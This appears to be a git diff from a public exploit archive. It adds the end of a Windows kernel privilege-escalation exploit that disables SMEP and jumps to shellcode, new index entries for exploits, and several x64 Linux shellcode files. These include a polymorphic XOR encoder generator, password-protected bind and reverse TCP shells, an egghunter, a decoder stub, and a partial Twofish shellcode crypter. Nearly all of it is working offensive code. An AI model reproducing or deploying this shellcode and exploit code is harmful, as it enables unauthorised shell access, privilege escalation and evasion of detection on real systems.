+	printf("[*] infoleak - nt!_C_specific_handler addr at %p\n", nt_c_specific_handler);
+
+	printf("[*] call nt pivot, disable SMEP\n");
+	initialize_fake_obj(obj, nt_c_specific_handler + NT_OFFSET_TO_PIVOT, CR4_VAL_ADDR, MAGIC_KEY, -1);
+	trigger_shm(MAGIC_KEY);
+
+	sleep(5);
+
+	printf("[*] jump to shellcode!\n");
+	initialize_fake_obj(obj, obj+0x200, CR4_VAL_ADDR, MAGIC_KEY, atoi(argv[1]));
+	trigger_shm(MAGIC_KEY);
+
+	sleep(2);
+
+	return 0;
+}
\ No newline at end of file
diff --git a/exploits/windows/webapps/43883.txt b/exploits/windows/webapps/43883.txt
index 7b351cfab..4213458bc 100644
--- a/exploits/windows/webapps/43883.txt
+++ b/exploits/windows/webapps/43883.txt
@@ -84,7 +84,7 @@ Upgrade to BMC Track-It! 11.5 or above.
 >> References:
 [1] https://raw.githubusercontent.com/pedrib/PoC/master/advisories/bmc-track-it-11.3.txt
 [2] https://communities.bmc.com/community/bmcdn/bmc_track-it/blog/2014/12/09/track-it-114-is-now-available
-[3] https://github.com/pedrib/PoC/tree/master/exploits/TrackPwn (EDB Mirror: //github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/43883.zip)
+[3] https://github.com/pedrib/PoC/tree/master/exploits/TrackPwn (EDB Mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/43883.zip)
 
 
 ================
diff --git a/files_exploits.csv b/files_exploits.csv
index b46bed390..624054667 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
@@ -9307,6 +9307,7 @@ id,file,description,date,author,type,platform,port
 43926,exploits/macos/local/43926.sh,"Arq 5.10 - Local Privilege Escalation (2)",2018-01-29,"Mark Wadham",local,macos,
 43929,exploits/windows/local/43929.c,"System Shield 5.0.0.136 - Privilege Escalation",2018-01-30,"Parvez Anwar",local,windows,
 43935,exploits/linux/local/43935.txt,"systemd (systemd-tmpfiles) < 236 - 'fs.protected_hardlinks=0' Local Privilege Escalation",2018-01-29,"Michael Orlitzky",local,linux,
+43962,exploits/windows/local/43962.c,"Microsoft Windows Subsystem for Linux - 'execve()' Local Privilege Escalation",2018-02-02,"Saar Amar",local,windows,
 41675,exploits/android/local/41675.rb,"Google Android 4.2 Browser and WebView - 'addJavascriptInterface' Code Execution (Metasploit)",2012-12-21,Metasploit,local,android,
 41683,exploits/multiple/local/41683.rb,"Mozilla Firefox < 17.0.1 - Flash Privileged Code Injection (Metasploit)",2013-01-08,Metasploit,local,multiple,
 41700,exploits/windows/local/41700.rb,"Sun Java Web Start Plugin - Command Line Argument Injection (Metasploit)",2010-04-09,Metasploit,local,windows,
@@ -37956,6 +37957,19 @@ id,file,description,date,author,type,platform,port
 43932,exploits/php/webapps/43932.txt,"Joomla! Component CP Event Calendar 3.0.1 - 'id' SQL Injection",2018-01-30,"Ihsan Sencan",webapps,php,
 43933,exploits/php/webapps/43933.txt,"Joomla! Component Visual Calendar 3.1.3 - 'id' SQL Injection",2018-01-30,"Ihsan Sencan",webapps,php,
 43934,exploits/windows/webapps/43934.py,"BMC BladeLogic RSCD Agent 8.3.00.64 - Windows Users Disclosure",2018-01-30,"Paul Taylor",webapps,windows,4750
+43940,exploits/php/webapps/43940.html,"Joomla! Component JEXTN Membership 3.1.0 - 'usr_plan' SQL Injection",2018-02-02,"Ihsan Sencan",webapps,php,
+43949,exploits/php/webapps/43949.txt,"Event Manager 1.0 - SQL Injection",2018-02-02,"Ihsan Sencan",webapps,php,
+43941,exploits/php/webapps/43941.txt,"Fancy Clone Script - 'search_browse_product' SQL Injection",2018-02-02,8bitsec,webapps,php,
+43942,exploits/php/webapps/43942.txt,"Real Estate Custom Script - 'route' SQL Injection",2018-02-02,8bitsec,webapps,php,
+43943,exploits/php/webapps/43943.txt,"Advance Loan Management System - 'id' SQL Injection",2018-02-02,8bitsec,webapps,php,
+43947,exploits/aspx/webapps/43947.txt,"IPSwitch MOVEit 8.1 < 9.4 - Cross-Site Scripting",2018-02-02,1n3,webapps,aspx,
+43948,exploits/php/webapps/43948.html,"Joomla! Component JE PayperVideo 3.0.0 - 'usr_plan' SQL Injection",2018-02-02,"Ihsan Sencan",webapps,php,
+43950,exploits/php/webapps/43950.txt,"Joomla! Component JEXTN Reverse Auction 3.1.0 - SQL Injection",2018-02-02,"Ihsan Sencan",webapps,php,
+43957,exploits/php/webapps/43957.txt,"Joomla! Component JEXTN Classified 1.0.0 - 'sid' SQL Injection",2018-02-02,"Ihsan Sencan",webapps,php,
+43958,exploits/php/webapps/43958.txt,"Joomla! Component Jimtawl 2.1.6 - Arbitrary File Upload",2018-02-02,"Ihsan Sencan",webapps,php,
+43959,exploits/php/webapps/43959.txt,"Joomla! Component JMS Music 1.1.1 - SQL Injection",2018-02-02,"Ihsan Sencan",webapps,php,
+43960,exploits/multiple/webapps/43960.py,"Oracle Hospitality Simphony (MICROS) 2.7 < 2.9 - Directory Traversal",2018-02-02,"Dmitry Chastuhin",webapps,multiple,
+43961,exploits/hardware/webapps/43961.txt,"FiberHome AN5506 - Unauthenticated Remote DNS Change",2018-02-02,r0ots3c,webapps,hardware,
 41641,exploits/php/webapps/41641.txt,"Joomla! Component JooCart 2.x - 'product_id' SQL Injection",2017-03-20,"Ihsan Sencan",webapps,php,
 41642,exploits/php/webapps/41642.txt,"Joomla! Component jCart for OpenCart 2.0 - 'product_id' SQL Injection",2017-03-20,"Ihsan Sencan",webapps,php,
 41644,exploits/php/webapps/41644.txt,"phplist 3.2.6 - SQL Injection",2017-03-20,"Curesec Research Team",webapps,php,80
diff --git a/files_shellcodes.csv b/files_shellcodes.csv
index bed20f689..4a79e9ef8 100644
--- a/files_shellcodes.csv
+++ b/files_shellcodes.csv
@@ -837,6 +837,12 @@ id,file,description,date,author,type,platform
 43734,shellcodes/linux_x86/43734.c,"Linux/x86 - Insertion Decoder + Null-Free Shellcode (33+ bytes)",2013-01-01,"Geyslan G. Bem",shellcode,linux_x86
 43910,shellcodes/linux_x86/43910.c,"Linux/x86 - Egghunter Shellcode (12 Bytes)",2018-01-28,"Nipun Jaswal",shellcode,linux_x86
 43921,shellcodes/arm/43921.asm,"Linux/ARM - Reverse TCP (192.168.1.1:4444/TCP) Shell (/bin/sh)+ Null-Free Shellcode (80 bytes)",2018-01-28,rtmcx,shellcode,arm
+43951,shellcodes/linux_x86-64/43951.nasm,"Linux/x64 - Bind TCP (4444/TCP) Shell (/bin/sh) + Password (1234567) Shellcode (136 bytes)",2018-11-09,0x4ndr3,shellcode,linux_x86-64
+43952,shellcodes/linux_x86-64/43952.nasm,"Linux/x64 - Reverse TCP (127.0.0.1:4444/TCP) Shell (/bin/sh) + Password (1234567) Shellcode (104 bytes)",2017-11-11,0x4ndr3,shellcode,linux_x86-64
+43953,shellcodes/linux_x86-64/43953.nasm,"Linux/x64 - Egghunter (0xbeefbeef) Shellcode (34 bytes)",2017-11-23,0x4ndr3,shellcode,linux_x86-64
+43954,shellcodes/linux_x86-64/43954.nasm,"Linux/x64 - Custom Encoded XOR + execve(/bin/sh) Shellcode",2017-12-16,0x4ndr3,shellcode,linux_x86-64
+43955,shellcodes/generator/43955.py,"Linux/x64 - Custom Encoded XOR + Polymorphic + execve(/bin/sh) Shellcode (Generator)",2017-12-19,0x4ndr3,shellcode,generator
+43956,shellcodes/linux_x86-64/43956.c,"Linux/x64 - Twofish Encoded + DNS (CNAME) Password + execve(/bin/sh) Shellcode",2018-02-02,0x4ndr3,shellcode,linux_x86-64
 42295,shellcodes/linux_x86/42295.c,"Linux/x86 - Reverse TCP (127.1.1.1:11111/TCP) Shell + Null-Free Shellcode (67 bytes)",2013-01-01,"Geyslan G. Bem",shellcode,linux_x86
 41723,shellcodes/linux_x86/41723.c,"Linux/x86 - Reverse TCP (192.168.3.119:54321/TCP) Shell (/bin/bash) Shellcode (110 bytes)",2017-03-24,JR0ch17,shellcode,linux_x86
 41750,shellcodes/linux_x86-64/41750.asm,"Linux/x64 - execve(/bin/sh) Shellcode (21 bytes)",2017-03-28,WangYihang,shellcode,linux_x86-64
diff --git a/shellcodes/generator/43955.py b/shellcodes/generator/43955.py
new file mode 100755
index 000000000..aa6c05a86
--- /dev/null
+++ b/shellcodes/generator/43955.py
@@ -0,0 +1,124 @@
+#!/usr/bin/python
+from random import randint
+
+encoded = ""
+encoded2 = ""
+
+bad_chars = [0x00]
+
+shellcode = ("\x90" + "\x6a\x3b\x58\x99\x52\x48\xbb\x2f\x2f\x62\x69\x6e\x2f\x73\x68\x53\x54\x5f\x52\x54\x5e\x57\x54\x5a\x0f\x05")
+
+def valid(byte):
+    for ch in bad_chars:
+        if ch == byte:
+            return False
+    return True
+
+valid_R = False
+while not valid_R:
+    R = randint(0,2**8-1)
+    print
+    print "random generated number (key): 0x%02x" %R
+    valid_R = True
+    for x in bytearray(shellcode):
+    	# XOR Encoding 	
+	y = x ^ R
+        if not valid(y):
+            valid_R = False
+            encoded = ""
+            encoded2 = ""
+            break
+	encoded += "\\x"
+	encoded += "%02x" %y
+	encoded2 += "0x"
+	encoded2 += "%02x," %y
+encoded2 = encoded2[0:-1] # the [0:-1] is just to remove the "," at the end 
+print "Encoded shellcode ..."
+print encoded
+print encoded2
+print
+print "Len: %d" % len(bytearray(shellcode))
+print
+
+tab = "   "
+poly_db = { "pop rdi":
+                [tab+"pop rdi\n",
+                 tab+"mov rdi,[rsp]\n"+tab+"add rsp,8\n"],
+            "push <param1>|pop <param2>":
+                [tab+"push <param1>\n"+tab+"pop <param2>\n",
+                 tab+"mov <param2>,<param1>\n"],
+            "mov byte dl,[rdi]":
+                [tab+"mov byte dl,[rdi]\n",
+                 tab+"mov r9,rdi\n"+tab+"mov byte dl,[r9]\n"],
+            "xor rdi,rdi":
+                [tab+"xor rdi,rdi\n",
+                 tab+"sub rdi,rdi\n"],
+            "inc rdi":
+                [tab+"inc rdi\n",
+                 tab+"dec rdi\n"+tab+"add rdi,2\n"],
+            "mov byte <param1>,byte <param2>":
+                [tab+"mov <param1>,<param2>\n",
+                 tab+"mov r9b,<param2>\n"+tab+"mov <param1>,r9b\n"],
+            "xor al,dil":
+                [tab+"xor al,dil\n",
+                 tab+"mov r9b,dil\n"+tab+"xor al,r9b\n"],
+            "cmp al,0x90":
+                [tab+"cmp al,0x90\n",
+                 tab+"mov ah,0xff\n"+tab+"cmp ax,0xff90\n"],
+            "push <number>|pop <param2>":
+                [tab+"push <param1>\n"+tab+"pop <param2>\n",
+                 tab+"xor <param2>,<param2>\n"+tab+"add <param2>,<param1>\n"],
+            "xor byte [rdi],al":
+                [tab+"xor byte [rdi],al\n",
+                 tab+"mov byte r9b,[rdi]\n"+tab+"xor r9b,al\n"+tab+"mov byte [rdi],r9b\n"],
+            "loop decode":
+                [tab+"loop decode\n",
+                 tab+"dec rcx\n"+tab+"xor r9,r9\n"+tab+"cmp r9,rcx\n"+tab+"jne decode\n"]
+        }
+def poly(instruction,param1="",param2="",param3=""):
+    options = poly_db[instruction]
+    r = randint(0,len(options)-1)
+    str = options[r]
+    str = str.replace("<param1>",param1)
+    str = str.replace("<param2>",param2)
+    str = str.replace("<param3>",param3)
+    return str
+
+code =  "global _start \n"
+code += "\n"
+code += "section .text\n"
+code += "\n"
+code += "_start:\n"
+code += "   jmp short find_address\n"
+code += "decoder:\n"
+code += "   ; Get the address of the string \n"
+code +=     poly("pop rdi")
+code +=     poly("push <param1>|pop <param2>","rdi","rbx")
+code += "\n"
+code += "   ; get the first byte and bruteforce till you get the token 0x90\n"
+
+code +=     poly("mov byte dl,[rdi]")
+code +=     poly("xor rdi,rdi") # key that will be incremented from 0x00 to 0xff
+code += "bruteforce:\n"
+code +=     poly("inc rdi")
+code +=     poly("mov byte <param1>,byte <param2>","al","dl")
+code +=     poly("xor al,dil")
+code +=     poly("cmp al,0x90")
+code += "   jne bruteforce\n"
+code += "\n"
+code +=     poly("push <number>|pop <param2>",str(len(bytearray(shellcode))),"rcx")
+code +=     poly("mov byte <param1>,byte <param2>","al","dil")
+code +=     poly("push <param1>|pop <param2>","rbx","rdi")
+code += "decode:\n"
+code +=     poly("xor byte [rdi],al")
+code +=     poly("inc rdi")
+code +=     poly("loop decode")
+code += "\n"
+code += "   jmp rbx\n" # jmp to decoded shellcode
+code += "   \n"
+code += "find_address:\n"
+code += "   call decoder\n"
+code += "   encoded db " + encoded2 + "\n"
+
+fout = open("decoder.nasm","w")
+fout.write(code)
\ No newline at end of file
diff --git a/shellcodes/linux_x86-64/43951.nasm b/shellcodes/linux_x86-64/43951.nasm
new file mode 100644
index 000000000..60b754108
--- /dev/null
+++ b/shellcodes/linux_x86-64/43951.nasm
@@ -0,0 +1,112 @@
+global _start
+
+_start:
+
+	; sock = socket(AF_INET, SOCK_STREAM, 0)
+	; AF_INET = 2
+	; SOCK_STREAM = 1
+	; syscall number 41 
+
+	push 41
+	pop rax
+	push 2
+	pop rdi
+	push 1
+	pop rsi
+	cdq
+	syscall
+	
+	; copy socket descriptor to rdi for future use 
+
+	xchg rdi,rax
+
+	; server.sin_family = AF_INET 
+	; server.sin_port = htons(PORT)
+	; server.sin_addr.s_addr = INADDR_ANY
+	; bzero(&server.sin_zero, 8)
+
+	push rdx
+	mov dx,0x5c11
+	shl rdx,16
+	xor dl,0x2
+	push rdx
+
+	; bind(sock, (struct sockaddr *)&server, sockaddr_len)
+	; syscall number 49
+
+	mov rsi, rsp
+	mov al,49
+	push 16
+	pop rdx
+	syscall
+
+	; listen(sock, MAX_CLIENTS)
+	; syscall number 50
+
+	push 50
+	pop rax
+	push 2
+	pop rsi
+	syscall
+
+	; new = accept(sock, (struct sockaddr *)&client, &sockaddr_len)
+	; syscall number 43
+
+	mov al,43
+	sub rsp,16
+	mov rsi,rsp
+	push 16
+	mov rdx,rsp
+	syscall
+
+	; close parent
+	;push 3
+	;pop rax
+	;syscall
+
+	; duplicate sockets
+
+	; dup2 (new, old)
+	xchg rdi,rax
+	push 3
+	pop rsi
+dup2cycle:
+	mov al, 33
+	dec esi
+	syscall
+	loopnz dup2cycle
+
+	; read passcode
+	; xor rax,rax - already zeroed from prev cycle
+	xor rdi,rdi
+	push rax
+	mov rsi,rsp
+	push 8
+	pop rdx
+	syscall
+
+	; Authentication with password "1234567"
+	xchg rcx,rax
+	mov rbx,0x0a37363534333231
+	push rbx
+	mov rdi,rsp
+	repe cmpsb
+	jnz wrong_pwd
+
+	; execve stack-method
+
+	push 59
+	pop rax
+	cdq ; extends rax sign into rdx, zeroing it out
+	push rdx
+	mov rbx,0x68732f6e69622f2f
+	push rbx
+	mov rdi,rsp
+	push rdx
+	mov rdx,rsp
+	push rdi
+	mov rsi,rsp
+	syscall
+
+wrong_pwd:
+	nop
\ No newline at end of file
diff --git a/shellcodes/linux_x86-64/43952.nasm b/shellcodes/linux_x86-64/43952.nasm
new file mode 100644
index 000000000..ce22154cf
--- /dev/null
+++ b/shellcodes/linux_x86-64/43952.nasm
@@ -0,0 +1,89 @@
+global _start
+
+_start:
+
+        ; sock = socket(AF_INET, SOCK_STREAM, 0)
+        ; AF_INET = 2
+        ; SOCK_STREAM = 1
+        ; syscall number 41 
+
+        push 41
+        pop rax
+        push 2
+        pop rdi
+        push 1
+        pop rsi
+        cdq
+        syscall
+
+        ; copy socket descriptor to rdi for future use 
+        xchg rdi, rax
+
+        ; server.sin_family = AF_INET 
+        ; server.sin_port = htons(PORT)
+        ; server.sin_addr.s_addr = inet_addr("127.0.0.1")
+        ; bzero(&server.sin_zero, 8)
+
+        push rdx ; already zeroed by "cdq" instruction
+        mov rbx, 0xfeffff80a3eefffd
+        not rbx
+        push rbx
+
+        ; connect(sock, (struct sockaddr *)&server, sockaddr_len)
+       
+	push rsp
+	pop rsi 
+        mov al,42
+        mov dl,16
+        syscall
+
+        ; duplicate sockets
+
+        ; dup2 (new, old)
+
+        push 3
+        pop rsi
+dup2cycle:
+        mov al, 33
+        dec esi
+        syscall
+        loopnz dup2cycle       
+        
+        ; read passcode
+        ; xor rax,rax - already zeroed out by prev cycle
+        xor rdi,rdi
+        push rax
+	push rsp
+	pop rsi
+        mov dl,8
+        syscall
+
+        ; Authentication with password "1234567"
+        xchg rcx,rax
+        mov rbx,0x0a37363534333231
+        push rbx
+	push rsp
+	pop rdi
+        repe cmpsb
+        jnz wrong_pwd
+
+        ; execve stack-method
+
+        push 59
+        pop rax
+        cdq ; extends rax sign into rdx, zeroing it out
+        push rdx
+        mov rbx, 0x68732f6e69622f2f
+        push rbx
+	push rsp
+	pop rdi
+        push rdx
+	push rsp
+	pop rdx
+        push rdi
+	push rsp
+	pop rsi
+        syscall
+
+wrong_pwd:
+        nop
\ No newline at end of file
diff --git a/shellcodes/linux_x86-64/43953.nasm b/shellcodes/linux_x86-64/43953.nasm
new file mode 100644
index 000000000..0453eb8d9
--- /dev/null
+++ b/shellcodes/linux_x86-64/43953.nasm
@@ -0,0 +1,23 @@
+global _start
+section .text
+_start:
+        xor rsi,rsi
+
+        push rsi ; starts the search at position 0
+        pop rdi
+
+next_page:
+        or di,0xfff
+        inc rdi
+
+next_4_bytes:
+        push 21
+        pop rax
+        syscall
+        cmp al,0xf2
+        jz next_page
+        mov eax,0xefbeefbd
+        inc al
+        scasd
+        jnz next_4_bytes
+        jmp rdi
\ No newline at end of file
diff --git a/shellcodes/linux_x86-64/43954.nasm b/shellcodes/linux_x86-64/43954.nasm
new file mode 100644
index 000000000..87987855e
--- /dev/null
+++ b/shellcodes/linux_x86-64/43954.nasm
@@ -0,0 +1,37 @@
+global _start 
+
+section .text
+
+_start:
+   jmp find_address ; jmp short by default
+decoder:
+   ; Get the address of the string 
+   pop rdi
+   push rdi
+   pop rbx
+
+   ; get the first byte and bruteforce till you get the token 0x90
+   mov byte dl, [rdi]
+   xor rdi,rdi ; key that will be incremented from 0x00 to 0xff
+bruteforce:
+   inc rdi
+   mov al,dl
+   xor al,dil
+   cmp al,0x90
+   jne bruteforce
+
+   push 27 ; shellcode length (given by encoder)
+   pop rcx
+   mov al,dil
+   push rbx
+   pop rdi
+decode:
+   xor byte [rdi], al
+   inc rdi
+   loop decode
+
+   jmp rbx ; jmp to decoded shellcode
+   
+find_address:
+   call decoder
+   encoded db 0x23,0xd9,0x88,0xeb,0x2a,0xe1,0xfb,0x08,0x9c,0x9c,0xd1,0xda,0xdd,0x9c,0xc0,0xdb,0xe0,0xe7,0xec,0xe1,0xe7,0xed,0xe4,0xe7,0xe9,0xbc,0xb6
\ No newline at end of file
diff --git a/shellcodes/linux_x86-64/43956.c b/shellcodes/linux_x86-64/43956.c
new file mode 100644
index 000000000..f214ab8ab
--- /dev/null
+++ b/shellcodes/linux_x86-64/43956.c
@@ -0,0 +1,1087 @@
+/*----- Crypter.c ----- */
+
+/* 
+   Optimized Twofish C implementation by Drew Csillag: https://www.schneier.com/code/twofish-cpy.zip
+   Partially re-written by Andre Lima (https://andrelima.info) to encrypt/decrypt variable length Linux x86_64 shellcode.
+   
+   compiler is gcc(egcs-2.91.66)
+   flags are -O3 -fomit-frame-pointer -Wall 
+   Processor is 233Mhz Pentium II (Deschutes)
+   OS is Linux 2.2.16
+*/
+
+#include <stdio.h>
+#include <stdlib.h>
+#include <string.h>
+#include <time.h>
+#include "tables.h"
+#define u32 unsigned int
+#define BYTE unsigned char
+#define RS_MOD 0x14D
+#define RHO 0x01010101L
+
+/* 
+   gcc is smart enough to convert these to roll instructions.  If you want
+   to see for yourself, either do gcc -O3 -S, or change the |'s to +'s and 
+   see how slow things get (you lose about 30-50 clocks) :).
+*/
+#define ROL(x,n) (((x) << ((n) & 0x1F)) | ((x) >> (32-((n) & 0x1F))))
+#define ROR(x,n) (((x) >> ((n) & 0x1F)) | ((x) << (32-((n) & 0x1F))))
+
+#if BIG_ENDIAN == 1
+#define BSWAP(x) (((ROR(x,8) & 0xFF00FF00) | (ROL(x,8) & 0x00FF00FF)))
+#else
+#define BSWAP(x) (x)
+#endif
+
+#define _b(x, N) (((x) >> (N*8)) & 0xFF)
+
+/* just casting to byte (instead of masking with 0xFF saves *tons* of clocks 
+   (around 50) */
+#define b0(x) ((BYTE)(x))
+/* this saved 10 clocks */
+#define b1(x) ((BYTE)((x) >> 8))
+/* use byte cast here saves around 10 clocks */
+#define b2(x) (BYTE)((x) >> 16)
+/* don't need to mask since all bits are in lower 8 - byte cast here saves
+   nothing, but hey, what the hell, it doesn't hurt any */
+#define b3(x) (BYTE)((x) >> 24)  
+
+#define BYTEARRAY_TO_U32(r) ((r[0] << 24) ^ (r[1] << 16) ^ (r[2] << 8) ^ r[3])
+#define BYTES_TO_U32(r0, r1, r2, r3) ((r0 << 24) ^ (r1 << 16) ^ (r2 << 8) ^ r3)
+
+void printSubkeys(u32 K[40])
+{
+    int i;
+    printf("round subkeys\n");
+    for (i=0;i<40;i+=2)
+	printf("%08X %08X\n", K[i], K[i+1]);
+}
+
+/* 
+   multiply two polynomials represented as u32's, actually called with BYTES,
+   but since I'm not really going to too much work to optimize key setup (since
+   raw encryption speed is what I'm after), big deal.
+*/
+u32 polyMult(u32 a, u32 b)
+{
+    u32 t=0;
+    while (a)
+    {
+	/*printf("A=%X  B=%X  T=%X\n", a, b, t);*/
+	if (a&1) t^=b;
+	b <<= 1;
+	a >>= 1;
+    }
+    return t;
+}
+	    
+/* take the polynomial t and return the t % modulus in GF(256) */
+u32 gfMod(u32 t, u32 modulus)
+{
+    int i;
+    u32 tt;
+
+    modulus <<= 7;
+    for (i = 0; i < 8; i++)
+    {
+	tt = t ^ modulus;
+	if (tt < t) t = tt;
+	modulus >>= 1;
+    }
+    return t;
+}
+
+/*multiply a and b and return the modulus */
+#define gfMult(a, b, modulus) gfMod(polyMult(a, b), modulus)
+
+/* return a u32 containing the result of multiplying the RS Code matrix
+   by the sd matrix
+*/
+u32 RSMatrixMultiply(BYTE sd[8])
+{
+    int j, k;
+    BYTE t;
+    BYTE result[4];
+
+    for (j = 0; j < 4; j++)
+    {
+	t = 0;
+	for (k = 0; k < 8; k++)
+	{
+	    /*printf("t=%X  %X\n", t, gfMult(RS[j][k], sd[k], RS_MOD));*/
+	    t ^= gfMult(RS[j][k], sd[k], RS_MOD);
+	}
+	result[3-j] = t;
+    }
+    return BYTEARRAY_TO_U32(result);
+}
+
+/* the Zero-keyed h function (used by the key setup routine) */
+u32 h(u32 X, u32 L[4], int k)
+{
+    BYTE y0, y1, y2, y3;
+    BYTE z0, z1, z2, z3;
+    y0 = b0(X);
+    y1 = b1(X);
+    y2 = b2(X);
+    y3 = b3(X);
+
+    switch(k)
+    {
+	case 4:
+	    y0 = Q1[y0] ^ b0(L[3]);
+	    y1 = Q0[y1] ^ b1(L[3]);
+	    y2 = Q0[y2] ^ b2(L[3]);
+	    y3 = Q1[y3] ^ b3(L[3]);
+	case 3:
+	    y0 = Q1[y0] ^ b0(L[2]);
+	    y1 = Q1[y1] ^ b1(L[2]);
+	    y2 = Q0[y2] ^ b2(L[2]);
+	    y3 = Q0[y3] ^ b3(L[2]);
+	case 2:
+	    y0 = Q1[  Q0 [ Q0[y0] ^ b0(L[1]) ] ^ b0(L[0]) ];
+	    y1 = Q0[  Q0 [ Q1[y1] ^ b1(L[1]) ] ^ b1(L[0]) ];
+	    y2 = Q1[  Q1 [ Q0[y2] ^ b2(L[1]) ] ^ b2(L[0]) ];
+	    y3 = Q0[  Q1 [ Q1[y3] ^ b3(L[1]) ] ^ b3(L[0]) ];
+    }
+
+    /* inline the MDS matrix multiply */
+    z0 = multEF[y0] ^ y1 ^         multEF[y2] ^ mult5B[y3]; 
+    z1 = multEF[y0] ^ mult5B[y1] ^ y2 ^         multEF[y3]; 
+    z2 = mult5B[y0] ^ multEF[y1] ^ multEF[y2] ^ y3; 
+    z3 = y0 ^         multEF[y1] ^ mult5B[y2] ^ mult5B[y3]; 
+
+    return BYTES_TO_U32(z0, z1, z2, z3);
+}
+
+/* given the Sbox keys, create the fully keyed QF */
+void fullKey(u32 L[4], int k, u32 QF[4][256])
+{
+    BYTE y0, y1, y2, y3;
+
+    int i;
+    
+    /* for all input values to the Q permutations */
+    for (i=0; i<256; i++)
+    {
+	/* run the Q permutations */
+	y0 = i; y1=i; y2=i; y3=i;
+	switch(k)
+    	{
+    	    case 4:
+    		y0 = Q1[y0] ^ b0(L[3]);
+    		y1 = Q0[y1] ^ b1(L[3]);
+    		y2 = Q0[y2] ^ b2(L[3]);
+    		y3 = Q1[y3] ^ b3(L[3]);
+    	    case 3:
+    		y0 = Q1[y0] ^ b0(L[2]);
+    		y1 = Q1[y1] ^ b1(L[2]);
+    		y2 = Q0[y2] ^ b2(L[2]);
+    		y3 = Q0[y3] ^ b3(L[2]);
+    	    case 2:
+    		y0 = Q1[  Q0 [ Q0[y0] ^ b0(L[1]) ] ^ b0(L[0]) ];
+    		y1 = Q0[  Q0 [ Q1[y1] ^ b1(L[1]) ] ^ b1(L[0]) ];
+    		y2 = Q1[  Q1 [ Q0[y2] ^ b2(L[1]) ] ^ b2(L[0]) ];
+    		y3 = Q0[  Q1 [ Q1[y3] ^ b3(L[1]) ] ^ b3(L[0]) ];
+    	}
+	
+	/* now do the partial MDS matrix multiplies */
+	QF[0][i] = ((multEF[y0] << 24) 
+		    | (multEF[y0] << 16) 
+		    | (mult5B[y0] << 8)
+		    | y0);
+	QF[1][i] = ((y1 << 24) 
+		    | (mult5B[y1] << 16) 
+		    | (multEF[y1] << 8)
+		    | multEF[y1]);
+	QF[2][i] = ((multEF[y2] << 24) 
+		    | (y2 << 16) 
+		    | (multEF[y2] << 8)
+		    | mult5B[y2]);
+	QF[3][i] = ((mult5B[y3] << 24) 
+		    | (multEF[y3] << 16)
+		    | (y3 << 8) 
+		    | mult5B[y3]);
+    }
+}
+
+/* fully keyed h (aka g) function */
+#define fkh(X) (S[0][b0(X)]^S[1][b1(X)]^S[2][b2(X)]^S[3][b3(X)])
+
+/* one encryption round */
+#define ENC_ROUND(R0, R1, R2, R3, round) \
+    T0 = fkh(R0); \
+    T1 = fkh(ROL(R1, 8)); \
+    R2 = ROR(R2 ^ (T1 + T0 + K[2*round+8]), 1); \
+    R3 = ROL(R3, 1) ^ (2*T1 + T0 + K[2*round+9]); 
+
+inline void encrypt(u32 K[40], u32 S[4][256], BYTE PT[16])
+{
+    u32 R0, R1, R2, R3;
+    u32 T0, T1;
+
+    /* load/byteswap/whiten input */
+    R3 = K[3] ^ BSWAP(((u32*)PT)[3]);
+    R2 = K[2] ^ BSWAP(((u32*)PT)[2]);
+    R1 = K[1] ^ BSWAP(((u32*)PT)[1]);
+    R0 = K[0] ^ BSWAP(((u32*)PT)[0]);
+
+    ENC_ROUND(R0, R1, R2, R3, 0);
+    ENC_ROUND(R2, R3, R0, R1, 1);
+    ENC_ROUND(R0, R1, R2, R3, 2);
+    ENC_ROUND(R2, R3, R0, R1, 3);
+    ENC_ROUND(R0, R1, R2, R3, 4);
+    ENC_ROUND(R2, R3, R0, R1, 5);
+    ENC_ROUND(R0, R1, R2, R3, 6);
+    ENC_ROUND(R2, R3, R0, R1, 7);
+    ENC_ROUND(R0, R1, R2, R3, 8);
+    ENC_ROUND(R2, R3, R0, R1, 9);
+    ENC_ROUND(R0, R1, R2, R3, 10);
+    ENC_ROUND(R2, R3, R0, R1, 11);
+    ENC_ROUND(R0, R1, R2, R3, 12);
+    ENC_ROUND(R2, R3, R0, R1, 13);
+    ENC_ROUND(R0, R1, R2, R3, 14);
+    ENC_ROUND(R2, R3, R0, R1, 15);
+
+    /* load/byteswap/whiten output */
+    ((u32*)PT)[3] = BSWAP(R1 ^ K[7]);
+    ((u32*)PT)[2] = BSWAP(R0 ^ K[6]);
+    ((u32*)PT)[1] = BSWAP(R3 ^ K[5]);
+    ((u32*)PT)[0] = BSWAP(R2 ^ K[4]);
+}
+
+/* one decryption round */
+#define DEC_ROUND(R0, R1, R2, R3, round) \
+    T0 = fkh(R0); \
+    T1 = fkh(ROL(R1, 8)); \
+    R2 = ROL(R2, 1) ^ (T0 + T1 + K[2*round+8]); \
+    R3 = ROR(R3 ^ (T0 + 2*T1 + K[2*round+9]), 1); 
+
+inline void decrypt(u32 K[40], u32 S[4][256], BYTE PT[16])
+{
+    u32 T0, T1;
+    u32 R0, R1, R2, R3;
+
+    /* load/byteswap/whiten input */
+    R3 = K[7] ^ BSWAP(((u32*)PT)[3]);
+    R2 = K[6] ^ BSWAP(((u32*)PT)[2]);
+    R1 = K[5] ^ BSWAP(((u32*)PT)[1]);
+    R0 = K[4] ^ BSWAP(((u32*)PT)[0]);
+
+    DEC_ROUND(R0, R1, R2, R3, 15);
+    DEC_ROUND(R2, R3, R0, R1, 14);
+    DEC_ROUND(R0, R1, R2, R3, 13);
+    DEC_ROUND(R2, R3, R0, R1, 12);
+    DEC_ROUND(R0, R1, R2, R3, 11);
+    DEC_ROUND(R2, R3, R0, R1, 10);
+    DEC_ROUND(R0, R1, R2, R3, 9);
+    DEC_ROUND(R2, R3, R0, R1, 8);
+    DEC_ROUND(R0, R1, R2, R3, 7);
+    DEC_ROUND(R2, R3, R0, R1, 6);
+    DEC_ROUND(R0, R1, R2, R3, 5);
+    DEC_ROUND(R2, R3, R0, R1, 4);
+    DEC_ROUND(R0, R1, R2, R3, 3);
+    DEC_ROUND(R2, R3, R0, R1, 2);
+    DEC_ROUND(R0, R1, R2, R3, 1);
+    DEC_ROUND(R2, R3, R0, R1, 0);
+
+    /* load/byteswap/whiten output */
+    ((u32*)PT)[3] = BSWAP(R1 ^ K[3]);
+    ((u32*)PT)[2] = BSWAP(R0 ^ K[2]);
+    ((u32*)PT)[1] = BSWAP(R3 ^ K[1]);
+    ((u32*)PT)[0] = BSWAP(R2 ^ K[0]);
+
+}
+
+/* the key schedule routine */
